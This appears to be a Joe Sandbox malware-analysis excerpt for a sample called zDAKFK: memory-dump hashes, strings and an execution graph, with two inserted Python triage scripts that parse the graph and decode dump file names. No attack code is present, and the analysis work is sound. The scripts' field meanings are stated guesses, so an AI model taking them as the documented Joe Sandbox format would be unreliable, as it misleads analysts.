                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 91656dd21f77bf61d60978bf076a6ce2821d6e85bd62130925eed5d6ce054921
                                                                                                                                                                      • Instruction ID: d2cb1f6b5d8a545cbeacd629d6d79f0f34660ed2efd5cb2b676edfb88fa2a9ef
                                                                                                                                                                      • Opcode Fuzzy Hash: 91656dd21f77bf61d60978bf076a6ce2821d6e85bd62130925eed5d6ce054921
                                                                                                                                                                      • Instruction Fuzzy Hash: 89E07575D0510CEFCB40DFA5D5448DDBBB5EB48200F1081AAD805A2204EA346F55DF80
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 0383ceaeeccb61d090eb9977745e135e0b9abba0cea76520715b6cd6113a998d
                                                                                                                                                                      • Instruction ID: 07bd0f94a6f36238a6a34a1e0b1469cedafdf584bc6d64410bae1e23adf7da44
                                                                                                                                                                      • Opcode Fuzzy Hash: 0383ceaeeccb61d090eb9977745e135e0b9abba0cea76520715b6cd6113a998d
                                                                                                                                                                      • Instruction Fuzzy Hash: 33E0BFB0A05108FFCB00EFE4E54145DBBF5EB45204B108565E805AB355EB366F04EB51
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 13c5b79c44e26e71edb171c496584d617a64671ca4fc141cc21baa245d76c435
                                                                                                                                                                      • Instruction ID: 6a0f7c2a6739bdfa20282b9bf4365b37f6847066ad8a47e5dd4b88d405d36d0d
                                                                                                                                                                      • Opcode Fuzzy Hash: 13c5b79c44e26e71edb171c496584d617a64671ca4fc141cc21baa245d76c435
                                                                                                                                                                      • Instruction Fuzzy Hash: 65C09B4954D38159FF1355305A503E43F712DC204CB5541F3CCD99D556D514FC0BB622
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f7eae605f239bed84fb94430fbe886dd173dfe56303d2e72527e14209a6ab6e3
                                                                                                                                                                      • Instruction ID: a26793de46b25a075105f2f0f5a1c11fcf21a7221ae4af0ee34b14b3933e8d89
                                                                                                                                                                      • Opcode Fuzzy Hash: f7eae605f239bed84fb94430fbe886dd173dfe56303d2e72527e14209a6ab6e3
                                                                                                                                                                      • Instruction Fuzzy Hash: E5B09B2131513513EA08319D64105FF72CD47C5569F50006B950D877414CC69C4102DE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 7e72234ba7c3d59a534f5c3b05979ba58a6ec64ad52a9b0549a1d2a69e22d3ee
                                                                                                                                                                      • Instruction ID: a6f1a3d08861299f6af5551f79b2713ad71551fd83364a5a2983f3c23f0a5a4e
                                                                                                                                                                      • Opcode Fuzzy Hash: 7e72234ba7c3d59a534f5c3b05979ba58a6ec64ad52a9b0549a1d2a69e22d3ee
                                                                                                                                                                      • Instruction Fuzzy Hash: 15C00236140509DFCB01CF54D944D9A3BB6FF58711F158495FA498B632C332D861EB50
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: bbf309e1d6fa071ffe99b40bf96b5bbf7bb93575ed9041c4b8a50f4fdd20c42c
                                                                                                                                                                      • Instruction ID: 4ff7d1668d711c5654b5fdb23496889caf79491e19897847ba0c60e1d674d19e
                                                                                                                                                                      • Opcode Fuzzy Hash: bbf309e1d6fa071ffe99b40bf96b5bbf7bb93575ed9041c4b8a50f4fdd20c42c
                                                                                                                                                                      • Instruction Fuzzy Hash: 5CB012163D0012537D00E335098423B50E3F7C1208384CC1110026001C4C18F8041005
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: fad604844d04f9c381ac05abd7b010f8f4aeaff16117bec06682b7aae6f313ac
                                                                                                                                                                      • Instruction ID: f3cb6a23e06cef605c0898f5a4c64aa520ce673665b175b11d4cce239ca5cd96
                                                                                                                                                                      • Opcode Fuzzy Hash: fad604844d04f9c381ac05abd7b010f8f4aeaff16117bec06682b7aae6f313ac
                                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                      • API String ID: 0-2697097662
                                                                                                                                                                      • Opcode ID: 79ca1eeb0916ddb8b06585ea1c4814a44beddb8591f8370a03a410d69ca73616
                                                                                                                                                                      • Instruction ID: e07166c869069a2834308e3d2282f9647fa7bf0c89318b125bffdaec83005c95
                                                                                                                                                                      • Opcode Fuzzy Hash: 79ca1eeb0916ddb8b06585ea1c4814a44beddb8591f8370a03a410d69ca73616
                                                                                                                                                                      • Instruction Fuzzy Hash: CD121B30E512099FCB48EF79E85569DB7B2FB81300F5149ACD009AF266DF306D898F95
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                      • API String ID: 0-2697097662
                                                                                                                                                                      • Opcode ID: 871fda2de1c9a3b01f722efd48d076fdb73d72dd64e61eaa1c735b9c12e8155c
                                                                                                                                                                      • Instruction ID: aef978fba24e9b36b183a0bd19c21727ae4a1404cb6b4676d2eeceafdd96e633
                                                                                                                                                                      • Opcode Fuzzy Hash: 871fda2de1c9a3b01f722efd48d076fdb73d72dd64e61eaa1c735b9c12e8155c
                                                                                                                                                                      • Instruction Fuzzy Hash: AC120B30E512099FCB48EF69E85569DB7B2FB81300F5149ACD009AF266DF306D89CF96
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                      • API String ID: 0-518715366
                                                                                                                                                                      • Opcode ID: ebea753c924f6927ef00ad45f01545b54242b906c084c0a9e48687baca297d1e
                                                                                                                                                                      • Instruction ID: 8a7b7a23ce5fa74e0768dead5ac1d40cb133e2424456191ee71d20faab5713ae
                                                                                                                                                                      • Opcode Fuzzy Hash: ebea753c924f6927ef00ad45f01545b54242b906c084c0a9e48687baca297d1e
                                                                                                                                                                      • Instruction Fuzzy Hash: 61712B31E0060A9FCB08EFA9D8546DDF7B2FF85304F618A29D0057F255EB70698ACB81

                                                                                                                                                                      Execution Graph

                                                                                                                                                                       Execution Coverage: 17%
                                                                                                                                                                       Dynamic/Decrypted Code Coverage: 100%
                                                                                                                                                                       Signature Coverage: 60%
                                                                                                                                                                       Total number of Nodes: 5
                                                                                                                                                                       Total number of Limit Nodes: 0
                                                                                                                                                                       execution_graph
                                                                                                                                                                       Nodes:
                                                                                                                                                                       • 12378 d9ec85
                                                                                                                                                                       • 12382 d9c5a8
                                                                                                                                                                       • 12380 d9ec90 LdrInitializeThunk
                                                                                                                                                                       • 12381 d9ecbc
                                                                                                                                                                       • 12383 d9c5aa
                                                                                                                                                                       Edges:
                                                                                                                                                                       • 12378->12382
                                                                                                                                                                       • 12380->12381
                                                                                                                                                                       • 12382->12383
                                                                                                                                                                       • 12383->12383 (self-loop)
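The execution_graph for this region is emitted as one run-together line of node declarations ("id hexaddr [ApiName]") and edges ("src->dst"). The following Python is an added example, not part of the Joe Sandbox report: it rebuilds the graph from that flattened text, finds the root nodes, and reports which roots reach a node that calls an API. The token grammar is inferred from the layout above and is an assumption; the sample input is the page's own graph text, embedded verbatim.

```python
import re
import json
from collections import defaultdict

# Constructed sample: the flattened execution_graph line from this report
# section (process 16, dynamically decrypted region at 0xD90000), verbatim.
SAMPLE_GRAPH = (
    "execution_graph 12378 d9ec85 12382 d9c5a8 12378->12382 "
    "12380 d9ec90 LdrInitializeThunk 12381 d9ecbc 12380->12381 "
    "12383 d9c5aa 12382->12383 12383->12383"
)

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
NODE_ID_RE = re.compile(r"^\d+$")
ADDR_RE = re.compile(r"^[0-9a-f]+$")


def _starts_node(tokens, i):
    """True when tokens[i] is a node id immediately followed by a hex address."""
    return (NODE_ID_RE.match(tokens[i]) is not None
            and i + 1 < len(tokens)
            and ADDR_RE.match(tokens[i + 1]) is not None)


def parse_execution_graph(text):
    """Tokenize the flattened graph text.

    Assumed grammar (inferred from the report layout, not a documented
    Joe Sandbox format): an optional 'execution_graph' header, then node
    declarations '<id> <hexaddr> [ApiName ...]' and edges '<src>-><dst>'
    in any order. Returns (nodes, edges); nodes maps id -> {'addr', 'apis'}.
    """
    nodes, edges = {}, []
    tokens = text.split()
    i = 1 if tokens and tokens[0] == "execution_graph" else 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
            continue
        if _starts_node(tokens, i):
            node_id, addr = int(tok), int(tokens[i + 1], 16)
            i += 2
            apis = []
            # Every following token that is neither an edge nor the start of
            # another node is an API name attached to this node.
            while i < len(tokens) and not EDGE_RE.match(tokens[i]) and not _starts_node(tokens, i):
                apis.append(tokens[i])
                i += 1
            nodes[node_id] = {"addr": addr, "apis": apis}
            continue
        raise ValueError(f"unexpected token {tok!r} at position {i}")
    return nodes, edges


def entry_nodes(nodes, edges):
    """Nodes with no incoming edge from a different node (self-loops ignored)."""
    targets = {d for s, d in edges if s != d}
    return sorted(n for n in nodes if n not in targets)


def api_reachability(nodes, edges):
    """Map each node to the sorted set of API names reachable from it,
    its own included. The visited set makes the 12383->12383 loop safe."""
    succ = defaultdict(list)
    for s, d in edges:
        succ[s].append(d)
    result = {}
    for start in nodes:
        seen, stack, apis = set(), [start], []
        while stack:
            n = stack.pop()
            if n in seen:
                continue
            seen.add(n)
            apis.extend(nodes.get(n, {}).get("apis", []))
            stack.extend(succ[n])
        result[start] = sorted(set(apis))
    return result


def summarize(text):
    """Triage view: size, roots, API-bearing nodes, and roots that reach an API."""
    nodes, edges = parse_execution_graph(text)
    reach = api_reachability(nodes, edges)
    roots = entry_nodes(nodes, edges)
    return {
        "node_count": len(nodes),
        "edge_count": len(edges),
        "roots": roots,
        "api_nodes": {n: d["apis"] for n, d in nodes.items() if d["apis"]},
        "roots_reaching_apis": [r for r in roots if reach[r]],
    }


if __name__ == "__main__":
    print(json.dumps(summarize(SAMPLE_GRAPH), indent=2))
```

On this graph the result separates two disconnected chains: 12378 -> 12382 -> 12383 (looping on itself) touches no API, while the root 12380 is the node that calls LdrInitializeThunk and leads only to 12381. That split is what you want to know before deciding which of the five functions to disassemble first.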
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.4132014214.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_d90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                      • Opcode ID: 0365010ee9ec099c22eefb38c9416c854ef56bf742bc93e2e41e72079dee990d
                                                                                                                                                                      • Instruction ID: fca0e655044c6da6e8a02a305c83f20b8a3c362033fbfcb81a37e47474f10ce3
                                                                                                                                                                      • Opcode Fuzzy Hash: 0365010ee9ec099c22eefb38c9416c854ef56bf742bc93e2e41e72079dee990d
                                                                                                                                                                      • Instruction Fuzzy Hash: 1C216B74E10229CFCB64DFA8D984B9DBBB1BF49304F1080A9E409AB365DB70A985CF50
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.4131065320.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_a7d000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: d485e1a87e51fc02202df26958e2eef3ff468c47479d1b060f7463bfef06bcc7
                                                                                                                                                                      • Instruction ID: 4d50eddfa77fc66b985399abcd7d9509d57d645b0b734a16d4667c0b6e9f65b0
                                                                                                                                                                      • Opcode Fuzzy Hash: d485e1a87e51fc02202df26958e2eef3ff468c47479d1b060f7463bfef06bcc7
                                                                                                                                                                      • Instruction Fuzzy Hash: 1421CF71504204EFCB14DF24D984B26BBB5FB84314F24CAA9E84E4B252C73AD847CA61
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.4131065320.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_a7d000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                      • Instruction ID: df0513cee84cd6ef49f8e80dff962473940abc81742311b840b07a32fe42b8ce
                                                                                                                                                                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                      • Instruction Fuzzy Hash: 76118B75504284DFDB15CF14D9C4B16BFB2FB84314F28C6AED84A4B656C33AD84ACB62
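Every Memory Dump Source entry above names its dump as a dotted .sdmp file and prints an Offset and a Snapshot File beside it. The following Python is an added example, not part of the Joe Sandbox report: it splits the .sdmp name into fields, cross-checks the fields that the page itself confirms (process index and stage against the hcaresult_<pid>_<stage>_<base> snapshot name, base address against Offset), and flags the region as an unpacked-code candidate when it is not PE-backed, private, and executable-writable. The interpretation of the fifth and seventh fields as the region's Win32 Protect and Type values is an assumption; the third, sixth and eighth fields are left undecoded. The sample input is the three source lines from this section, embedded verbatim.

```python
import re

# Constructed sample: (sdmp name, Offset, Snapshot File) copied from the
# three Memory Dump Source entries in this report section.
SAMPLE_SOURCES = [
    ("0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp",
     "04A90000", "hcaresult_12_2_4a90000_zDAKFK.jbxd"),
    ("00000010.00000002.4132014214.0000000000D90000.00000040.00000800.00020000.00000000.sdmp",
     "00D90000", "hcaresult_16_2_d90000_zDAKFK.jbxd"),
    ("00000010.00000002.4131065320.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp",
     "00A7D000", "hcaresult_16_2_a7d000_zDAKFK.jbxd"),
]

# Win32 memory constants. Assumption: field 5 carries the Protect value and
# field 7 the Type value as VirtualQuery reports them; the report does not
# document its file-name format.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

SDMP_RE = re.compile(
    r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})"
    r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)
SNAPSHOT_RE = re.compile(r"^hcaresult_(\d+)_(\d+)_([0-9a-f]+)_\w+\.jbxd$")


def parse_sdmp_name(name):
    """Split a Joe Sandbox .sdmp file name into its dotted fields."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox .sdmp name: {name}")
    proc_idx, stage, field3, base, protect, field6, mtype, field8 = m.groups()
    protect_v = int(protect, 16)
    type_v = int(mtype, 16)
    return {
        "process_index": int(proc_idx, 16),   # confirmed by hcaresult_<pid>_...
        "stage": int(stage, 16),              # confirmed by hcaresult_<pid>_<stage>_...
        "base": int(base, 16),                # confirmed by the Offset column
        # Low byte only: PAGE_GUARD / PAGE_NOCACHE modifiers live above it.
        "protect": PAGE_PROTECT.get(protect_v & 0xFF, f"0x{protect_v:X}"),
        "type": MEM_TYPE.get(type_v, f"0x{type_v:X}"),
        "undecoded": (field3, field6, field8),  # meaning not known; kept raw
    }


def check_consistency(sdmp_name, offset_hex, snapshot_name):
    """Cross-check the decoded fields against Offset and Snapshot File.
    Returns (info, list_of_problems); an empty list means all agree."""
    info = parse_sdmp_name(sdmp_name)
    m = SNAPSHOT_RE.match(snapshot_name)
    if not m:
        raise ValueError(f"not a Joe Sandbox snapshot name: {snapshot_name}")
    snap_proc, snap_stage, snap_base = int(m.group(1)), int(m.group(2)), int(m.group(3), 16)
    problems = []
    if info["base"] != int(offset_hex, 16):
        problems.append("base != Offset")
    if info["process_index"] != snap_proc:
        problems.append("process index != snapshot")
    if info["stage"] != snap_stage:
        problems.append("stage != snapshot")
    if info["base"] != snap_base:
        problems.append("base != snapshot base")
    return info, problems


def is_unpacked_code_candidate(info, based_on_pe):
    """A private, non-image-backed region that is both writable and executable
    is the usual home of unpacked or injected code: carve it first."""
    return (not based_on_pe
            and info["type"] == "MEM_PRIVATE"
            and info["protect"] == "PAGE_EXECUTE_READWRITE")


if __name__ == "__main__":
    for name, offset, snapshot in SAMPLE_SOURCES:
        info, problems = check_consistency(name, offset, snapshot)
        print(f"pid#{info['process_index']} stage {info['stage']} base 0x{info['base']:08X} "
              f"{info['protect']} {info['type']} candidate={is_unpacked_code_candidate(info, False)} "
              f"problems={problems or 'none'}")
```

All three dumps decode as process index 12 or 16, stage 2, PAGE_EXECUTE_READWRITE, MEM_PRIVATE, and the report marks each "based on PE: false"; the base address in each name matches both the Offset column and the snapshot name, so the three are consistent, non-image RWX regions, which is exactly where a .NET stager's decrypted payload or an injected PE would be found.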